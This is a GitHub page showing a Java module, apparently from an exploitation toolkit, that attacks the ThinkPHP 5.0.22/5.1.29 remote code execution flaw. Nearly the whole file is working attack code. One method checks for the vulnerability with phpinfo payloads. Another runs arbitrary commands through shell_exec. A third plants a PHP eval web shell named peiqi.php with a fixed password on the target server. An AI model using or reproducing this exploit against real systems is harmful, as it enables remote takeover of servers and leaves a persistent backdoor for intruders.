FilesExpand file tree

 main

/

tp5022_5129.java

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

74 lines (68 loc) · 3.39 KB

 main

/

tp5022_5129.java

Top

File metadata and controls

• Code
• Blame

executable file

·

74 lines (68 loc) · 3.39 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

package exploit;

import com.github.kevinsawicki.http.HttpRequest;

import util.BasePayload;

import util.Module;

import util.Result;

import java.util.ArrayList;

/**

* Author 莲花 2021/6/17

*/

//v5.0.23及v5.1.31以下版本

public class tp5022_5129 implements BasePayload {

@Override

public Result checkVUL(String url) throws Exception {

String CheckStr = "PHP Version";

Module m = new Module();

String module = m.getModule(url);

ArrayList<String> payload_urls = new ArrayList<String>() {{

add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");

add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");

add(url + "/?s=/" + module + "/\\think\\view\\driver\\php/display&content=<?php%20phpinfo();?>");

}};

for (String payload_url : payload_urls) {

try {

HttpRequest req1 = HttpRequest.get(payload_url);

if (req1.body().contains(CheckStr)) {

return new Result(true, "ThinkPHP 5.0.22/5.1.29 RCE", payload_url);

}

} catch (Exception e) {

e.printStackTrace();

}

}

return new Result(false, "ThinkPHP 5.0.22/5.1.29 RCE", "");

}

public Result exeVUL(String url, String cmd) throws Exception {

Module m = new Module();

String module = m.getModule(url);

try {

String payload_url = url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=" + cmd;

String res = HttpRequest.get(payload_url).body();

return new Result(true, null, res);

} catch (Exception e) {

e.printStackTrace();

}

return new Result(false, null, null);

}

public Result getShell(String url) throws Exception {

Module m = new Module();

String module = m.getModule(url);

ArrayList<String> payload_urls = new ArrayList<String>() {{

add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]=<?php%20@eval($_POST[%27peiqi%27])?>");

add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'peiqi.php'/**/,'/***/<?php%20@eval($_POST[%27peiqi%27])?>/***/')/**/;/**/?>");

add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]='<?php%20@eval($_POST[%27peiqi%27])?>'&vars[1][1]=peiqi.php");

add(url + "/?s=/" + module + "/\\think\\template\\driver\\file/write&cacheFile=peiqi.php&content=<?php%20@eval($_POST[%27peiqi%27])?>");

}};

for (String payload_url : payload_urls) {

try {

String res = HttpRequest.get(payload_url).body();

int code = HttpRequest.get(url + "/peiqi.php").code();

if (code == 200) {

return new Result(true, null, url + "/peiqi.php Pass:peiqi");

}

} catch (Exception e) {

e.printStackTrace();

}

}

return new Result(false, null, null);

}

}